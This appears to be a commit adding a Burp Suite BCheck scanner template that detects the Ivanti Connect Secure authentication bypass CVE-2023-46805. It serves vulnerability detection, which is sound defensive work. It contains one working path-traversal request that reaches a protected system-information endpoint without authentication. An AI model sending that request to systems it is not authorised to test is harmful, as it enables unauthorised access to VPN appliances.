CVE-2023-46805 - Ivanti Connect Secure Authentication Bypass.

PortSwigger · Feb 5, 2024 · 7b1f10b · 7b1f10b
1 parent 76ed78d
commit 7b1f10b
Showing 1 changed file with 27 additions and 0 deletions.
diff --git a/vulnerabilities-CVEd/CVE-2023-46805-Ivanti Auth Bypass.bcheck b/vulnerabilities-CVEd/CVE-2023-46805-Ivanti Auth Bypass.bcheck
@@ -0,0 +1,27 @@
+# https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/
+# https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis
+
+metadata:
+    language: v2-beta
+    name: "CVE-2023-46805 - Ivanti Connect Secure and Ivanti Policy Secure Authentication Bypass"
+    description: "Checks for CVE-2023-46805"
+    author: "trikster"
+    tags: "CVE-2023-46805", "cve", "auth-bypass", "ivanti"
+
+
+given host then
+    send request called check:
+        method: "GET"
+        path: "/api/v1/totp/user-backup-code/../../system/system-information"
+
+    if {check.response.status_code} is "200" and
+        "Content-Type: application/json" in {check.response.headers} and
+        {check.response.body} matches "(?m)\s*\{\s*\"software-inventory\"\s*:\s*\{\s*\"software\"\s*:\s*\{\s*\"name\"\s*:\s*\"\w+\"" then
+
+        report issue:
+            severity: high
+            confidence: firm
+            detail: "Application appears to be vulnerable to CVE-2023-46805."
+            remediation: "Apply vendor patches."
+
+    end if